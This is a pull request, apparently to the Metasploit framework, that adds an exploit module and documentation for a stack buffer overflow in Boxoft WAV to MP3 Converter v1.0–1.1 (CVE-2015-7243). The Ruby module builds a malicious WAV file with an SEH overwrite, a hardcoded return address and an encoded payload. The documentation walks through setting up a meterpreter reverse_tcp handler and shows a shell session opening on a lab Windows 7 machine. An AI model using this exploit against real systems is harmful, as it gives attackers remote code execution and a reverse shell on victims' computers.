### PR TITLE
Add Boxoft WAV to MP3 Converter exploit module

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md
+++ b/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md
@@ -1,7 +1,7 @@
 
 ## Vulnerable Application
 
-  This module exploits a stack-based buffer overflow in Boxoft WAV to MP3 Converter.
+  This module exploits a stack-based buffer overflow in Boxoft WAV to MP3 Converter v1.0-v1.1. 
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md
+++ b/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md
@@ -1,0 +1,74 @@
+
+## Vulnerable Application
+
+  This module exploits a stack-based buffer overflow in Boxoft WAV to MP3 Converter.
+
+## Verification Steps
+
+   1.  Install application on the target machine
+   2.  Start msfconsole
+   3.  Do: `use [exploit/multi/handler]`
+   4.  Do: `set payload [windows/meterpreter/reverse_tcp]`
+   5.  Do: `set LHOST [IP]`
+   6.  Do: `run`
+   7.  Do: `use [exploit/windows/fileformat/boxoft_wav_to_mp3]`
+   8.  Do: `set payload [windows/meterpreter/reverse_tcp]`
+   9.  Do: `set LHOST [IP]`
+   10. Do: `run`
+   11. Copy the generated file to the target machine
+   12. Open Boxoft WAV to MP3 Converter
+   13. Select `Next` at the bottom
+   14. Select `Add`
+   15. Browse to the file and select it
+   16. Click `Convert to MP3`
+
+   You should get a shell.
+
+## Options
+
+  **FILENAME**
+
+  The filename that the shellcode gets written to. Setting a filename is not required, as there is a default name already set.
+
+## Scenarios
+
+### Tested on Windows 7 x86
+
+
+  Generate File
+
+  ```
+  msf5 > use exploit/windows/fileformat/boxoft_wav_to_mp3 
+  msf5 exploit(windows/fileformat/boxoft_wav_to_mp3) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf5 exploit(windows/fileformat/boxoft_wav_to_mp3) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(windows/fileformat/boxoft_wav_to_mp3) > run
+
+  [+] music.wav stored at /Users/space/.msf4/local/music.wav
+
+  ```
+  Set up Handler
+
+  ```
+  msf5 > use exploit/multi/handler
+  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444 
+  [*] Sending stage (179779 bytes) to 192.168.37.138
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.138:49178) at 2018-06-29 14:41:11 -0500
+
+  meterpreter > sysinfo
+  Computer        : WIN7-LAB
+  OS              : Windows 7 (Build 7601, Service Pack 1).
+  Architecture    : x86
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+
+  ```

--- a/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md
+++ b/documentation/modules/exploit/windows/fileformat/boxoft_wav_to_mp3.md
@@ -35,7 +35,7 @@
 ### Tested on Windows 7 x86
 
 
-  Generate File
+  Run Exploit 
 
   ```
   msf5 > use exploit/windows/fileformat/boxoft_wav_to_mp3 

--- a/modules/exploits/windows/fileformat/boxoft_wav_to_mp3.rb
+++ b/modules/exploits/windows/fileformat/boxoft_wav_to_mp3.rb
@@ -1,0 +1,62 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow",
+      'Description'    => %q{
+       This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.
+       By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the application,
+       a buffer is overwritten, which allows for running shellcode.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Robbie Corley', # EDB POC
+                            'Shelby Pace'    # Metasploit Module
+                          ],
+      'References'     =>
+        [
+          [ 'CVE', '2015-7243' ],
+          [ 'EDB', '38035' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Boxoft WAV to MP3 Converter v1.1',
+            {
+              'Ret' => 0x0040144c
+            }
+          ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Aug 31 2015",
+      'DefaultTarget'  => 0))
+
+      register_options(
+      [
+        OptString.new('FILENAME', [true, 'File to write shellcode to', 'music.wav'])
+      ])
+  end
+
+  def exploit
+    file_payload = payload.encode
+
+    buf = make_fast_nops(4132)
+    buf << "\xeb\x06\x90\x90"       # nseh -- jump to shellcode
+    buf << [target.ret].pack("V*")  # seh
+    buf << file_payload
+    buf << make_fast_nops(5860)     # end of shellcode
+
+    file_create(buf)
+  end
+end

--- a/modules/exploits/windows/fileformat/boxoft_wav_to_mp3.rb
+++ b/modules/exploits/windows/fileformat/boxoft_wav_to_mp3.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
     buf << "\xeb\x06\x90\x90"       # nseh -- jump to shellcode
     buf << [target.ret].pack("V*")  # seh
     buf << file_payload
-    buf << make_fast_nops(5860)     # end of shellcode
+    buf << make_fast_nops(5860)
 
     file_create(buf)
   end


### PR DESCRIPTION
This module exploits a stack-based buffer overflow in Boxoft WAV to MP3 Converter v1.0-v1.1.

## Verification

- [x]  Install application on the target machine
- [x]  Start msfconsole
- [x]  Do: `use [exploit/multi/handler]`
- [x]  Do: `set payload [windows/meterpreter/reverse_tcp]`
- [x]  Do: `set LHOST [IP]`
- [x]  Do: `run`
- [x]  Do: `use [exploit/windows/fileformat/boxoft_wav_to_mp3]`
- [x]  Do: `set payload [windows/meterpreter/reverse_tcp]`
- [x]  Do: `set LHOST [IP]`
- [x] Do: `run`
- [x] Copy the generated file to the target machine
- [x] Open Boxoft WAV to MP3 Converter
- [x] Select `Next` at the bottom
- [x] Select `Add`
- [x] Browse to the file and select it
- [x] Click `Convert to MP3`

You should get a shell
